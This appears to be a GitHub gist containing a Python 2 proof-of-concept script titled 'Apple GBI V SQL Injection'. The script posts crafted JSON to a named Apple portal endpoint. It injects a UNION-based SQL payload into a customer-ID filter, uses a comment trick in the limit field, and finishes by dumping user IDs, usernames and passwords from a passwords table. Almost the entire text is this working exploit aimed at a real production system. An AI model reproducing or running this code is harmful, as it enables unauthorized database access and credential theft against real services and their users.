Skip to content

Instantly share code, notes, and snippets.

@ziot

ziot/vsqli.py Secret

Created August 18, 2020 21:59
Show Gist options
  • Save ziot/3c079fb253f4e467212f2ee4ce6c33cb to your computer and use it in GitHub Desktop.
Save ziot/3c079fb253f4e467212f2ee4ce6c33cb to your computer and use it in GitHub Desktop.
Apple GBI V SQL Injection
import requests, json
def doInject(injectionQuery):
url = "https://gbiportal-apps-external.apple.com/gsf/partShipment/businessareas/AppleCare/subjectareas/acservice/services/batch"
r = requests.post(url, headers = {
"content-type": "application/json",
"X-Requested-With": "XMLHttpRequest",
"CSRF": "",
"Origin": "https://gbiportal-apps-external-msc.apple.com",
"Cookie": ""
}, json = {
"executionType": "parallel",
"requests": [{
"queryName": "query_for_table_filter",
"filters": {
"D_sold_to_cust_Id": [injectionQuery],
"D_ship_to_cust_Id": [""],
"D_ORDER_SHIP_DATE": [""],
"D_Repair_Type_Cd": [""],
"D_Order_ID": [""],
"D_Dispatch_Id": [""],
"orderBy": ["service_notification_number"],
"orderType": ["desc"],
"limit": ["*/*/ limit 5000"],
"offset": ["0"]
}
}]
})
try:
for result in json.loads(r.text)["result"][0]["query_for_table_filter"]:
data = result["service_notification_number"].rstrip()
print " ".join(data.split("$$$")).encode("utf8")
except:
print 'failed'
def getData(columns, table, schema=""):
columnStr = ""
for column in columns:
if columnStr == "":
columnStr+="{}".format(column)
else:
columnStr+="||'$$$'||{}".format(column)
if schema:
fromStr = "{}.{}".format(schema,table)
else:
fromStr = table
query = "-1' UNION all SELECT {},null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM/**/{} /*".format(columnStr, fromStr)
doInject(query)
getData(["user_id","user_name","password"],"passwords","v_catalog")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment